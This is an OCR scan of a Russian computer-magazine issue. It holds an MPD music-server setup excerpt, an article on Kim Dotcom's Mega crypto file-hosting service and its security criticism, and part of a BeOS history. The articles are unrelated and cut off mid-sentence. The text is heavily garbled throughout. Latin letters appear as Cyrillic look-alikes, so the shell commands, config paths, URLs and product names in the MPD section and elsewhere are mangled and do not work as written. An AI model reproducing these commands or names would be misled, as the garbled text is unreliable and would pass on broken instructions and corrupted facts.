удобство на порядок 
выше большинства 
обычных плееров 




МРБ 

Увы, встроенный функционал ХВМС для рабо- 
ты с музыкой оставляет желать лучшего. Пла- 
гин шевелится очень медленно, и обновление 
библиотеки (особенно при работе с сетевым 
хранилищем) занимает очень много времени. 
Лучше делегировать задачу МРР — очень 
продвинутому музыкальному решению, хорошо 
знакомому хардкорным юниксоидам. 

МРй — это настоящий музыкальный 
сервер. В его ведомстве будет находиться 
поддержание медиатеки. Поиск арта и тек- 
стов песен также можно отдать на откуп МРО. 

В свою очередь, в ХВМС доступен плагин, 
позволяющий подключиться к МРО. Точно так 
же к твоему серверу сможет подключиться 
почти любое устройство в доме — например, 
для АпсігоісІ доступен отличный плеер МРОгоісІ 
(доо.дІ/Е7д1р). Существуют клиенты для мно- 
жества платформ, можно настроить даже 
веб-интерфейс. 

Установим наш сервер и сделаем простей- 
шую конфигурацию: 

зисіо арі-§еі іпзіаіі трсі 

ср /изг/зЬаге/сІос/трсІ/трсІсопТ.ехатрІе ^ 

~/.трсІсоп-Р 

тксііг -р ~/.трсІ/р1ау1І5І:5 

ТоисЬ ~/ .трсЩсІаіаЬазеДо^рісІ^зТаТе} 

папо ~/.трс!соп-Р 

Укажем созданные служебные файлы 
в конфиге. Для этого нужно изменить следую- 
щие строчки: 

тизіс_с1ігесТогу "/тесИа/НО/Миз^" 

р1ау1ізТ_с1ігес1:огу н /Ьоте/$ІІ5ЕК/ .трсі/^ 
р1ау1і5*5" 

с1Ь_Я1е 'ѴЬоте/$и5ЕК/.гпрсІ/^ 

сІаіаЬазе" 

1о§_Я1е "/Ьоте/$ІІ5ЕК/.трсІ/1о§" 

рій_Я1е "/Ьоте/$и5ЕК/.трсІ/рісГ 

зіа1:е_Я1е И /Ьоте/$и5ЕК/.трсІ/^ 

з-СаТе" 

Как только ты закончишь, можешь проте- 
стировать, набрав в консоли трб. После этого 
вбей настройки в плагин ХВМС. з: 
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Мария «МКгіІІ» Нефедова (тіІгіІИгеаІ.хакер.ги) 




О ПЕРЕРОЖДЕННОМ 
МЕ6АУРЮА0 

На страницах И мы достаточно пристально сле- 
дили за историей «опального» файл-хостинга 
МедаирІоасІ и судьбой его создателя, Кима До- 
ткома. Естественно, когда Дотком запустил новый 
сервис по адресу теда.со.пг (теда сопз — бук- 
вально «мегамошенники»), мы не могли пройти 
мимо. Кроме того, создатели объявили свой новый 
сервис неприступной крепостью с точки зрения 
безопасности и закона — так ли это на самом деле? 



ПРЕДЫСТОРИЯ 

Чуть больше года назад, 19 января 2012 года, популярный файлооб- 
менник МедаирІоасІ был закрыт, а в Новой Зеландии арестовали четы- 
рех топ-менеджеров компании, включая основателя МедаирІоасІ Кима 
Доткома (замечу, что фамилия, данная Киму при рождении, — Шмиц, 
но он официально поменял ее на Ооісот в 2005 году). 

Тогда Департамент юстиции США обвинил файлообменник 
в способствовании распространению пиратского контента. За пять 
лет работы МедаирІоасІ якобы нанес индустрии развлечений ущерб 
в размере 500 миллионов долларов (в виде недополученной при- 
были). Кроме того, он якобы породил «криминальные денежные 
потоки» на сумму 175 миллионов. Также вице-президент МРАА 
назвал Доткома «самым злостным нарушителем копирайта в мире». 
Дата-центры МедаирІоасІ в Нидерландах, Канаде и штате Вашинг- 
тон были арестованы, и правоохранители конфисковали 18 доменов, 
на которых размещались родственные проекты МедаирІоасІ. Поль- 
зователи, разумеется, негодовали и даже подавали в суд на ФБР 
с требованием вернуть доступ к файлам, но тщетно — возродить 
файлообменник не удавалось. 
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Мега.афе.ра 




У Меда отличный вкус 



Однако радовались правообладатели недолго. Через месяц после 
ареста вся команда ресурса, включая Доткома, вышла под залог, так 
и не признав своей вины. Кима долго не хотели отпускать, полагая, 
что он спешно покинет страну, и припоминая ему, что в молодости 
он уже был судим за продажу чужих кредиток. В итоге суд все же смило- 
стивился, убедившись, что все средства на его счетах заморожены, 
а имущество изъято. Но оказалось, что изъятием коллекции дорогих 
авто и денег со счетов Кима Доткома не испугать. Выйдя под залог 
в конце февраля, уже в марте он раздавал оптимистичные интервью 
и всячески показывал, что вовсе не намерен сдаваться. Ким рассказал 
журналистам, что ему совершенно не понравился налет на его дом 
спецназа, перепугавший до полусмерти его беременную жену. Напомню, 
что в операции были задействованы два вертолета, пять микроавтобу- 
сов и 76 человек с собаками, бойцы спецназа и других подразделений 
полиции, вооруженные пистолетами и винтовками, а также агенты 
ФБР. Рассказал Дотком и о том, что все претензии правообладателей — 
«полная чушь». Так, МРАА никогда не обращалась в Медаиріоасі с пре- 
тензиями и имела возможность напрямую удалять любой пиратский 
контент с обменника. Суммы, прозвучавшие в зале суда, Дотком тоже 
поднял на смех: минимум 500 миллионов долларов ущерба от музы- 
кальных файлов за период в две недели означают около 13 миллиардов 
долларов ущерба в год. Создатель Медаиріоасі заметил, что вся музы- 
кальная индустрия США вряд ли стоит больше 20 миллиардов. 

Одним словом, все свелось к тому, что из Медаиріоасі сделали козла 
отпущения. На вопрос, почему именно Медаиріоасі, Дотком в интервью 
новозеландскому ТВ ответил так: «потому что я легкая мишень. Дело 
в моей экстравагантности, хакерском прошлом, в том, что я, знаете 
ли, не американец — живу где-то в Новой Зеландии, у черта на кулич- 
ках. У меня прикольные номера на автомобилях и все такое». Подводя 
итог, Дотком заявил, что не собирается мириться со всем происшед- 
шим и будет бороться. Те, кто внимательно следил за этой историей, 



не удивились, когда осенью все того же 2012 года Дотком официаль- 
но объявил, что скоро запустит новый файлообменник, еще лучше 
прежнего. Он пообещал, что проект (получивший имя Меда) будет 
недосягаем для «копирастов» и вообще практически неуязвим. 
Давай посмотрим, что вышло из этой затеи. 

ПРИНЦИП РАБОТЫ 

Дотком и команда задались идеей не просто создать удобный 
файлообменный ресурс, а при этом затроллить правообладателей 
и правоохранительные органы. И как только первые подробности 
просочились наружу, многие СМИ вполне заслуженно окрестили 
Меда криптохостингом. Все файлы, загружаемые на серверы 
Меда, шифруются прямо в браузере при помощи 2048-битных 
ключей. Генерация, конечно, случайна, но для большей надежно- 
сти основывается на пароле пользователя, а также на произволь- 
ных движениях мыши и нажатиях на кнопки клавиатуры. Таким 
образом, ни хостер, ни провайдер понятия не имеют, что именно 
хранится на серверах. 

Данные при этом распределены в облаке, между серверами, на- 
ходящимися в разных странах мира. Команда Меда больше не скла- 
дывает все яйца в одну корзину, так что потеря нескольких серверов 
не обернется для пользователей потерей данных. Публичные ключи 
также хранятся в облаке, а не на компьютере пользователя. 

И возвращаясь к троллингу правообладателей: получается, 
что даже если какая-либо организация сумеет найти ключ шифро- 
вания и доказать, что конкретный зашифрованный файл содержит 
нелегальный контент, то администрация Меда удалит этот файл. 

Но благодаря все тому же шифрованию дедупликация файлов на сер- 
вере технически невозможна, так что уничтожить одним махом все 
экземпляры файла просто не представляется реальным. Правообла- 
дателям придется «бороться» с каждым экземпляром отдельно. 

Еще на подготовительных этапах, когда Меда не был запущен, 
Дотком ехидно пообещал киностудиям и звукозаписывающим 
компаниям возможность напрямую удалять файлы, но только в том 
случае, если они подпишут бумагу, гарантирующую отказ от пре- 
тензий к самому сервису. Пользователям, в свою очередь, наме- 
кали на настоящий пиратский рай — ргіѵасу, шифрование и много 
места под файлы. 

ФУНКЦИОНАЛЬНОСТЬ 

Сервис стартовал на скромном новозеландском домене пледа. 
со.П 2 . Исходно открытие планировалось по адресу те. да, однако 
власти африканского государства Габон, которому принадлежит 
эта зона, оказались сильно против и заявили, что не собираются 
«служить платформой или сценой, на которой будут развора- 
чиваться действия, нацеленные на нарушение авторских прав 
недобросовестными людьми». Так файлообменник перебрался 
на менее красивый адрес. 

С точки зрения функциональности Меда мало чем отличается 
от своих коллег и конкурентов по цеху, скорее даже уступает им 
в ряде моментов. Но, как и любое файловое хранилище, Меда 
позволяет загружать файлы и целые папки, хранить их и делить- 



НЕМНОГО ЦИФР 



• Через пять дней после запуска Меда. со. пг достиг отметки 141 
в АІеха.сот, оставив позади РарісіБЬаге и ОгорЬох 

• Более 100 000 человек зарегистрировались в первый час. 

• К концу второй недели хостилось более 50 миллионов файлов. 

• Ожидается, что в месяц будет поступать по 20 петабайт 
пользовательских данных (на протяжении первого полугодия). 







А Файл менедор 


ОбпммІ 
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ся ими с другими. Для начала перечислю положительные стороны. 
Пожалуй, основным плюсом Меда можно назвать немалое количество 
места: сервис предоставляет пользователю целых 50 Гб бесплатного 
пространства. Пусть сравнивать не совсем корректно, но все же заме- 
чу, что йгорЬох предлагает 2 Гб бесплатно (максимум 18 Гб с реферал- 
лами), боодіе Эгіѵе — 5 Гб, а БкуОгіѵе — 7 Гб. Более близкие по логике 
МесііаРіге и РарісІБЬаге с трудом могут с этим поспорить. Так, МесііаРіге 
тоже предлагает до 50 Гб бесплатного места, но имеет ограничение 
на размер файла — 200 Мб. О РарісІБЬаге и говорить нечего — теорети- 
ческая неограниченность на деле оборачивается урезанной скоро- 
стью, лимитом в 1 Гб трафика в день и другими неприятными вещами. 

К тому же залить на «Рапиду» что-то мало-мальски нелегальное в по- 
следние годы практически невозможно. Также к плюсам Меда можно 
отнести простой, минималистичный интерфейс — заливать файлы 
можно банальным сігад-апсі-сігор — и возможность использовать сер- 
вис без регистрации (хотя в таком случае возможности будут несколь- 
ко ограничены). Словом, с управлением разберется даже ребенок. 

Нет у Меда и ограничения на размер заливаемых файлов, что тоже 
может многим прийтись по душе. 

Для тех, кому мало 50 Гб, конечно, предусмотрены премиум-ак- 
каунты: дополнительное пространство можно приобрести в объеме 
500 Гб, 1 Тб и 2 Тб. Ежемесячная стоимость подписки составит 13,29, 
26,59 и 39,90 доллара соответственно. Поделиться доступом можно 
как к отдельным файлам, так и к целым папкам. При расшаривании 
доступа нужно указать е-таіі другого пользователя, а также задать 
права доступа: только чтение, чтение и запись, полный доступ. После 
права всегда можно будет изменить. Если же возникла необходимость 
поделиться отдельным файлом, Меда сгенерирует ссылку для загруз- 
ки. Здесь есть и один интересный нюанс: ссылка может сразу вклю- 
чать ключ для доступа и иметь вид Ьир5://теда.со.п2/#!о5А2СА20!6сітр 
ѵѵѴѴт2іиѵѵНх1М4ѴЛіх2Н5хуШтХпКЗВѴ8Шдад1о, а может и не включать. 
Это своеобразная дополнительная мера безопасности. То есть можно 
опубликовать ссылку в широком доступе, а ключ передать только 
нужным людям, «лично в руки». Ну и еще одна маленькая, но приятная 
особенность — Меда поддерживает русский язык. 

А дальше начинаются минусы. Клиента для десктопов, а также 
приложений для мобильных устройств пока нет. Разумеется, это обе- 
щают исправить в самом скором будущем (а еще прикрутить к сервису 
собственный ІМ и прочие свистелки), но пока придется работать с тем, 
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Презентация сервиса прошла крайне эффектно 



что есть, — с веб-интерфейсом. И никакой тебе синхронизации 
файлов между несколькими устройствами, за этим к ОгорЬох'у. Из- 
за шифрования для медиафайлов недоступен онлайн-просмотр, 
что тоже представляет определенное неудобство. 

Также Меда считает все браузеры, кроме боодіе СЬготе, «уста- 
ревшими» и настойчиво рекомендует пользователям переходить 
на Хром. Цитируя официальное сообщение: «пока другие обозре- 
ватели пробуют внедрить всю функциональность НТМІ.5, боодіе 
СЬготе уже это сделал». В остальных обозревателях действитель- 
но возможны проблемы. У меня в последней версии Орега, к приме- 
ру, отказались появляться выпадающие меню, при помощи которых 



СТОРОННИЕ РЕШЕНИЯ 



Как очень метко шутят на просторах Сети: «из-за Меда уже наверняка 
возник не один десяток стартапов». За стартапы не поручусь, но сто- 
ронние сервисы действительно уже начали появляться. Наиболее 
заметен один из них — поисковик, отыскивающий на криптохостинге 
фильмы и музыку. 

Ресурс, заработавший по адресу теда-веагсИ. те. действительно 
успешно находит файлы, предоставляя пользователям интерфейс 
для полнотекстового поиска по названиям. Каким образом это воз- 
можно, если файлы зашифрованы? Но погоди кидать камни в ого- 
род шифрования Меда — поисковик работает совершенно честно. 
Обычная ссылка на Меда сразу содержит в себе ключ для расшиф- 
ровки файла. Переходя по такому линку, ты получаешь файл уже 
в расшифрованном виде. Так работает и поисковая система: попросту 
ищет в Сети ссылки на файлы Меда и добавляет их в свой поисковый 
индекс. При этом владельцы Меда все равно не знают, что хранится 
на их хостинге, а значит, не несут за это никакой юридической от- 
ветственности. 

Однако у поисковика наметилась и первая проблема — все же 
команда Меда перестраховывается, ведь Дотком решил обезопасить 
себя с гарантией. Так, спустя буквально пару дней после запуска по- 



исковика почти все файлы, засветившиеся в нем, были удалены с сер- 
веров Меда. Что интересно — это коснулось даже контента, не нару- 
шающего ничьих авторских прав. Это удивило многих пользователей, 
а парни с ТоггепіРгеак даже провели эксперимент — залили на Меда 
видеоклипы и фильмы, которые точно опубликованы под свободной 
лицензией. Например, фрагмент документального фильма о Рігаіе Вау 
или старый видеоклип самого Кима Доткома. После экспериментато- 
ры специально выложили ссылки на файлы в открытый доступ. 

Ситуация повторилась — файлы вскоре были удалены. На е-таіі 
владельца Меда-аккаунта пришло письмо с объяснениями, гласив- 
шее, что в адрес Меда якобы поступили запросы от правообладателей 
(каких именно — не указано) с требованием удалить файлы. В письме 
также сообщается, что пользователь ни в коем случае не должен 
использовать криптохостинг Меда для нарушения чужих авторских 
прав. На самом деле правообладатели просто не успели бы так опера- 
тивно подать жалобу, да и в данном случае жаловаться было попросту 
некому. Словом, похоже, что в Меда работает что-то вроде собствен- 
ного отдела «цензуры» или «команды зачистки», которая не разби- 
рается что к чему, а просто удаляет все скомпрометированные файлы. 
Как эту проблему обойдет теда-веагсЬ.те, пока непонятно. 
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производится управление файлами. 
Похожие баги были замечены и в Ріге^ох. 

Помимо прочего, у Меда имеются 
ощутимые проблемы со скоростью. За- 
грузить в обменник картинку или пару 
музыкальных треков удается быстро, 
но, если поставить на загрузку файл 
более серьезного размера, можно долго 
наблюдать за полоской прогресс-бара 
и грустной надписью вроде «зреесі: 

290 кЬ/з». Что интересно, в боодіе 
СЬготе такой проблемы не наблюдает- 
ся — в браузере «корпорации добра» 
скорость почти всегда в порядке. Штука 
в том, что СЬготе использует НТМ1.5 
РіІеБузІет АРІ. Надеемся, причина тор- 
мозов на других браузерах — повышен- 
ное внимание публики к Меда и огром- 
ная нагрузка, упавшая на его серверы 
в первые дни ажиотажа. В противном случае такая дискриминация 
здорово удручает, все же СЬготе не единственный браузер на свете. 

Еще один минус — из-за шифрования отсутствовала возмож- 
ность восстановить или сменить пароль. Он вводится только один 
Р аз — П Р И регистрации (и его лучше хорошенько запомнить). Впрочем, 
возможность смены пароля все же реализовали, для этого достаточно 
залогиниться на сайт и нажать на соответствующую кнопку в разделе 
«Аккаунт». А вот забывать пароль крайне не рекомендуется — про- 
цедуры восстановления не предусмотрено. 

КРИТИКА 

Основным объектом жарких способов и критики стала, конечно же, си- 
стема шифрования Меда. Сразу ряд солидных изданий (таких как Агз 
ТесЬпіса, ТЬе Ѵегде и РогЬез) опубликовали весьма скептические 
мнения относительно нового детища Кима Доткома. 

Одним из первых на тему шифрования нелестно высказался крипто- 
граф Чадим Кобейсси (автор Сгуріосаі). Двадцатидвухлетний специалист 
пишет: «такое чувство, что код Меда написал я сам, в 2011 году, будучи 
в стельку пьян». Дело в том, что поначалу Сгуріосаі работал по схоже- 
му принципу и тоже шифровал прямо в браузере, но позже Кобейсси 
отказался от этой идеи. Кобейсси уверен, что сама схема шифрования 
файлов в браузере, ключом, полученным от сервера, далека от идеала. 
Неизвестно, какой именно ключ присылает сервер, работает ли шифро- 
вание вообще (если сервер отключит его, пользователь об этом и не узна- 
ет), если да, то каким образом. Все это выглядит крайне ненадежно еще 
и потому, что ряд серверов файлохранилища расположен в США, и все 
мы знаем, чем это может закончиться. Получается этакая «криптография 
на доверии», что, конечно, довольно странно. 

Другие эксперты склонны согласиться с автором Сгуріосаі. Боль- 
шинство уверено, что должен существовать некий доверенный объект 
на стороне пользователя, которым и будет подписываться шифр. Если 
же эта задача возложена на ^ѵаБсгірІ-библиотеку в браузере, полу- 
ченную от самого Меда, о каком доверии вообще может идти речь? 

На этот счет прекрасно высказался Метью Грин, профессор криптогра- 
фии в Институте информационной безопасности им. Джона Хопкинса: 
«ТаѵаБсгірІ, верифицирующий сам себя, — это все равно что попытка 
поднять себя, потянув за шнурки, — из этого ничего не выйдет». 

Впрочем, стоит сказать, что схема работы Меда скорее направле- 
на на противостояние с представителями закона и авторских прав, 
а не призвана защищать пользователей. С этих позиций все выглядит 
несколько логичнее. 





Настройки скачивания в Меда на редкость гибкие 



Критиковали Меда и за то, что шифрование целиком основано 
на 551 — технологии, которую уже многократно ломали. На это Дотком 
ответил, что «если вы в состоянии взломать 55(_, вам под силу взло- 
мать множество других ресурсов, которые куда интереснее Меда». 

Был обнаружен ряд ХББ-уязвимостей, позволяющих пере- 
хватить пользовательские соокіез и получить доступ к аккаунту. 
Дырки оперативно закрыли. Агз ТесЬпіса также отмечает странную 
фразу в условиях обслуживания, гласящую, что с хостинга будут 
удаляться дубликаты файлов. Выходит, хваленое ргіѵасу и шиф- 
рование не совсем так хороши и существует возможность узнать, 
есть ли на серверах дубликат некоего файла? Ответ на этот вопрос 
«и да и нет». Дедупликация действительно существует, но это со- 
вершенно нормально и безопасно, как уверяет нас официальный 
блог Меда ( теда.со.п 2 /#Ыоа 3 ). Умельцы уже создали программу 
МедаСгаскег ( іоЫи.сот/теаасгаскег.рЬр ). которая подбирает паро- 
ли от файлообменника по хешу, присланному в ссылке подтверж- 
дения регистрации. Таблицу с предвычисленными хешами автор 
программы гордо залил на сам Меда :). 

Реакция команды Меда на этот шквал критики спокойная. В блоге 
ресурса недавно появились ответы на самые острые вопросы от- 
носительно шифрования, дедупликации и прочего. К примеру, объ- 
яснено, что ^ѵаБсгірІ не совсем «верифицирует сам себя». Так, часть 
^ѵаБсгірІ проходит с доверенного НТТРБ-сервера с 2048-битным 
шифрованием и верифицирует другие части ^ѵаБсгірІ, пришедшие 
с недоверенных НИР / 1024-битных НТТР5. 

В том же блоге прога МедаСгаскег вообще была названа «отлич- 
ным примером того, почему не стоит использовать в качестве паролей 
слова и легко угадываемые комбинации, особенно когда этот пароль 
также служит и ключом шифрования для всех файлов на Меда». 

Подводя итог, скажу, что пиратского рая и суперкриптохостин- 
га, похоже, не получилось, а вот интересный сервис — вполне. 
Ошибки исправляются, вопросы не остаются без ответов, функцио- 
нальность обещает расширяться — для начала неплохо. Кстати, 
недавно Ким Дотком в своем Твиттере и вовсе пообещал в скором 
времени провести конкурс по поиску уязвимостей в Меда. Разуме- 
ется, с денежными призами, ос 
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ИСТОРИЯ 



ОПЕРАЦИОННОЙ СИСТЕМЫ ВЕ05 




Рубеж 80-х и 90-х годов — особенная эпоха для настольных ПК. Различные 
компании предпринимали последние попытки войти на этот рынок. Перед 
тем как МісгозоК встала «у руля» на два с лишним десятилетия, успели 
выйти самые оригинальные и удивительные проекты. Одним из них была 
Ве05 — уникальная система, значительно опередившая свое время 
и оказавшая большое влияние на индустрию ІТ. 
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Быть странным 



1990-1993: БЫТЬ СМЕЛЫМ 



Компанию Ве Іпс. основал Жан-Луи Гассе 
иеап-І_оиІ5 бавзёе) в 1990 году. В прошлом — 
руководитель представительства Арріе 
во Франции, чуть позже занял должность 
начальника всех исследовательских и про- 
изводственных подразделений компании. 

На его счету такие продукты, как Мае РІиз, 
МэсіпіобЬ II и МасіпІовН БЕ, что уже говорит 
о многом. Итак, покинув «яблочную» компанию 
с суммой 1,7 миллиона долларов, он занялся 
созданием совершенно нового компьютера, 
который, по его мнению, мог бы оставить 
след в истории ІТ-индустрии наравне с ІВМ 
РС и МасіпІовЬ. Тем более на слуху был успех 
Соттосіоге, Бііісоп бгарЫсз и других, поэтому 
идея не выглядела такой безумной, как может 
показаться сегодня. 

Поначалу небольшая компания Гассе 
состояла из нескольких человек, но это 
с лихвой компенсировалось их талантами. 

За железную начинку отвечал Стив Сакоман 
(Біеѵе Бакотап), один из бывших сотрудников 
Арріе, создатель проекта Меѵѵіоп — первого 
карманного персонального компьютера в мире. 
За год упорной работы им удалось собрать 
первый прототип, который они назвали ВеВох. 
Он базировался на весьма экзотическом 
железе для персонального компьютера: два 
процессора НоЬЫ* по 20 МГц от фирмы АТ&Т 
и три цифровых вспомогательных сигнальных 
процессора Ю5Р), которые отвечали за об- 
работку звуковых и видеоданных. Остальные 
комплектующие было решено использовать 
стандартные, ІВМ-совместимые. Основной 
особенностью ВеВох было его быстродей- 
ствие, стабильность системы и расширяемость 
мультимедийных возможностей, ведь его пози- 
ционировали именно как мультимедиасистему. 

После того как разработчики заполучи- 
ли достаточно мощную и работоспособную 
железную основу, пришло время выбрать 
операционную систему с графическим интер- 
фейсом. Гассе пригласил на работу програм- 
мистов Боба Герольда (ВоЬ Негоісі) и Эрика 



Рингвальда (они тоже выходцы из Арріе), 
а также Бенуа Шиллингса (Вепоіі БсЫІІіпдз). 
Основные требования, которые предъявляли 
к ОС, были следующими: поддержка многопро- 
цессорной конфигурации; файловая система, 
которая поддерживала бы работу с большими 
мультимедиафайлами; стабильность; удобство 
и доступность для пользователей. Была по- 
пытка внедрить ОС ЫеѴѴБ от Бип Місгозузіетз, 
но она не увенчалась успехом. В связи с этим 
было решено начать разработку собственной 
операционной системы, которая удовлетворя- 
ла бы всем требованиям. 

Так как архитектура ВеВох была род- 
ной и хорошо знакомой для разработчиков, 
то многозадачная операционная система ВеОБ 
удалась, как говорится, на славу. Ее быстро- 
действию и надежности могли позавидовать 
многие. Операционная система была создана 
с чистого листа и не несла багажа устарева- 
ющих технологий. Чего нельзя было сказать 
о ѴѴіпсіоѵѵз, с ее наследием в лице устарева- 
ющей МБ-йОБ (хотя, конечно, уже появился 
ѴѴіпМТ). 

Несмотря на то что ВеОБ получилась почти 
ІІІМІХ-совместимой и на нее можно было пор- 
тировать программы из Ыпих, все же графиче- 
ский интерфейс был вшит в ядро. В конце 1991 
года к Ве Іпс. примкнул Сирил Меуриллон (СугіІ 
МеигіІІоп), который начал работу над ядром 
для ВеОБ. В это же время в проект пригласили 
Доминика Джампаоло Юотіпіс біатраоіо), ав- 
тора знаменитой файловой системы ВР5. Бенуа 
Шиллинге совместно с Домиником написали 
первую версию графической подсистемы ВеОБ, 
которая позднее превратится в главную часть 
системы — АррБегѵег. 1993 год ознаменовался 
выходом первой тестовой версии ВеОБ ОВ1 
Юеѵеіортепі Реіеаэе). Уже через год вышла 
версия ОР2, в которой добавили поддержку 
БСБІ-дисков, и система обзавелась средства- 
ми разработки приложений. Можно выделить 
ключевые особенности операционной системы 
ВеОБ, которые выгодно отличали ее от конку- 
рентов: 




Одновременный запуск десяти игр — так создатели 
демонстрировали невиданную по тем временам 
мультизадачность 



ВеОБ была построена на микроядерной 
архитектуре. Система состояла из микроядра 
иразличныхеерверов, которые отвечали за вы- 
полнение отведенных им функций. 

АРІ (интерфейс программирования прило- 
жений) ВеОБ был объектно-ориентированным. 
Этот подход позволял программистам свободно 
использовать части кода в различных програм- 
мах, что существенно ускоряло их создание. 

Вытесняющая многозадачность. В боль- 
шинствеоперационныхсистем каждый процесс 
управляется диспетчером процессов. Чем 
больше процессов находится подуправлением 
диспетчера, тем менее быстрой и стабильной 
становится система. В многопоточныхсистемах 
же каждый процесс может создавать свои соб- 
ственные процессы, которые выполняют строго 
определенныефункции, что значительно раз- 
гружает диспетчер. Кпримеру, в ВеОБ каждое 
открытое окно создает два новых процесса: кли- 
ентский и серверный. Первый процесс получает 
и обрабатывает пользовательские события, 
такие как нажатия клавиш и движение мыши, 
тогда как второй занимается обработкой задач, 
связанных непосредственно с самим окном. 

5МР (симметричная многопроцессорная 
обработка). Потоки могут использовать не- 
сколько процессоров, установленных в компью- 




Жан-Луи Гассе, основатель Ве Іпс. Его темпераменту ВеОБ обязана как своей Ве Іпс. начали, как тогда еще было принято, с железа, а не софта. Так родился ВеВох 

интересностью, так и своей печальной судьбой 
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тер (ВеОБ поддерживала до восьми), переходя 
с процессора на процессор в зависимости от их 
загруженности. Например: во время загрузки 
системы один процессор отвечаетза отображе- 
ние на экране логотипа операционной системы, 
а второй — за поиск и подгрузкудрайверов. 
Такой подход позволил ВеОБ выиграть в про- 
изводительности до 80-1 00% по сравнению 
с однопроцессорными системами. 

Ориентация на обработку мультимедий- 
ных данных. Многопоточный дизайн ВеОБ 
и высокая отзывчивость системы позволяли ей 
легко справляться нетолькосаудио- и видео- 
данными, нотакжеистрехмерной графикой. 
Планировщикзадач ВеОБавтоматически зада- 
вал приоритеты выполняющимся в «реальном 
режиме» процессам, таким как графический 
интерфейс, запись видео или его воспроизве- 
дение. 

64-разрядная файловая система ВР5 с под- 
держкой расширенных файловых атрибутов 
(метаданных), индексируемая, что приближа- 
ло ее функциональность к реляционным БД. 
Она поддерживала жесткие диски объемом 
до нескольких терабайт и благодаря журнали- 
рованиютранзакций предотвращала потерю 
данных. 



1994-1996: БЫТЬ МОДНЫМ 



Однако летом 1994 года АТ&Т сообщила о пре- 
кращении производства процессоров НоЬЬіІ, 
которые использовались в ВеВох. И Ве Іпс. 
была вынуждена переделать свой компьютер 
на основе более дешевого, распространенного 
и мощного процессора РоѵѵегРС мощностью 
60 МГц. В связи с этим отпала нужда в допол- 
нительных ОБР-процессорах, но от многопро- 
цессорной конфигурации они не отказались, 
поэтому РоѵѵегРС трудились в паре. Новая 
конфигурация получилась даже лучше преды- 
дущей по быстродействию, также в систему 
были внедрены все новинки того времени. 

К концу 1994 года финансовые запасы Ве Іпс. 
иссякли, и конец был близок, но Гассе решил 
представить ВеВох публике в надежде найти 
инвесторов. 

На выставке Адепіа'95 ВеВох с ВеОБ в ка- 
честве начинки произвел фурор. Стив Сакоман 
подготовил презентацию, которая демонстри- 
ровала одновременную обработку восьми 
АѴІ-видеофайлов и трехмерной графики. Все 
это работало одновременно и без малейшего 
торможения. Система демонстрировала произ- 
водительность на уровне ІВМ Р5/6000, которая 
стоила десятки тысяч долларов, в то время 
как ВеВох стоил всего 1995 долларов. Эта 
выставка принесла Ве Іпс. дополнительные 



инвестиции на сумму 6 миллионов долларов. 

В апреле 1996 года была выпущена седьмая 
тестовая версия ВеОБ РР7, которая могла 
похвастаться поддержкой 32-битного цвета, 
новой файловой системой ВР5, виртуальны- 
ми рабочими столами, а также улучшенными 
сетевыми возможностями. 

Но деньги снова заканчивались, и следу- 
ющей целью была выставка МасѴ/ѴогІсІ Ехро, 
проходившая летом 1996 года. Главной задачей 
было показать, как отлично ВеОБ работает 
на компьютере Роѵѵег МасіпІозЬ, кроме того, 
система также работала на клонах МасіпІозЬ 
(в то время Арріе лицензировала платформу 
другим производителям). Вытесняющая много- 
задачность и защищенный режим памяти — 
это то, чего ждали от операционной системы 
Соріапб фирмы Арріе. Но этого у нее не было, 
зато было у ВеОБ. И после выставки Арріе 
предложила Гассе продать его компанию Ве 
Іпс. Жан-Луи запросил слишком высокую цену 
в 300 миллионов долларов, в то время как Арріе 
предложила лишь 100 миллионов. Переговоры 
были прекращены. Стоит отметить, что позже, 
после краха проекта Соріапб в 1997 году, Арріе 
приобрела компанию 1МЕХТ Іпс., возглавляемую 
Стивом Джобсом, за 430 миллионов долларов. 
Остальное, как говорится, уже история. 

В конце августа 1996-го вышел в свет 
новый ВеВох, а вместе с ним и новая версия 
ВеОБ 0В8, в которой появилась библиотека 
Зй Кіі, позволявшая разработчикам наделить 
свои приложения интерактивной трехмер- 
ной графикой. Также появилась библиотека 
бате Кіі, предоставляющая прямой доступ 
к графическому адаптеру компьютера, новый 
веб-браузер ІЧеіРоБІІіѵе и новые элементы 
графического интерфейса, а также улучшенная 
поддержка аппаратного обеспечения. 26 но- 
ября 1996 года Роѵѵег Сопприііпд стала первой 
компанией, которая лицензировала ВеОБ. 

За ней последовали ОауБіаг, Моіогоіа и ІІМАХ. 
В мае 1997 года свет увидел ВеОБ РР1 (Ргеѵіеѵѵ 
Реіеазе), который включал в себя улучшен- 
ную и обновленную файловую систему ВР5, 
ставшую 64-разрядной, программный режим 
ускорения ОрепОЦ новый интерфейс под на- 
званием Тгаскег, улучшенный стек ТСР/ІР. 



1997-1998: БЫТЬ ГЛУПЫМ 



Дела у Ве Іпс. шли очень хорошо: распростра- 
нено более 500 тысяч копий ВеОБ, а также 
налажены партнерские отношения с произ- 
водителями клонов МасіпІозЬ. Плюс уве- 
личивающееся с каждым днем количество 
разработчиков приложения для ВеОБ, на тот 
момент около 4400 разработчиков. Но не тут-то 



ГЛАВНОЙ ЗАДАЧЕЙ БЫЛО ПОКАЗАТЬ, 
КАК ОТЛИЧНО ВЕ05 РАБОТАЕТ 
НА КОМПЬЮТЕРЕ РОЖЕК МАСШТ05Н 
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Интернет-терминал Бопу еѴіІІа — последняя попытка 
использовать ВеОБ на нестандартной платформе 






ЯИЧНИЦА 

ЗА 300 МИЛЛИОНОВ 

Существует и более интересная точка 
зрения на то, почему провалились 
переговоры между Арріе и ВеОБ. Когда 
переговоры были в самом разгаре, 
Гассе дал следующий комментарий 
прессе: «Мы держим их за яйца. 

Мы будем сжимать их, пока они 
не закричат от боли». Напомним, 
что к этому моменту он пытался 
получить за свою компанию втрое 
больше того, что предлагала Арріе. 
По слухам, выпад Гассе выдал его 
с головой, и заметка с комментарием 
дошла до руководства Арріе. Сделку 
немедленно отменили. 
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Быть странным 



было. У руля Арріе к тому моменту встал Стив 
Джобс, который решил покончить с рынком 
клонов МасіпІозЬ, лишив тем самым сразу всех 
потенциальных клиентов Ве Іпс. Гассе не оста- 
валось ничего, кроме как искать новые рынки 
для продажи ВеОБ. И единственным таким 
рынком был рынок компьютеров, построенных 
на архитектуре х86. 

На выставке БоКѵѵаге Оеѵеіортепі’98 
компания Ве Іпс. представила публике ВеОБ 
3.0, которая работала на компьютерах с про- 
цессорами Іпіеі. Даже несмотря на то, что были 
представлены новые процессоры Репііит II, 
ВеОБ очень шустро работала и на простых 
Репііит. Корпорация Іпіеі и ряд других фирм 
вложили в Ве Іпс. 25 миллионов долларов. 

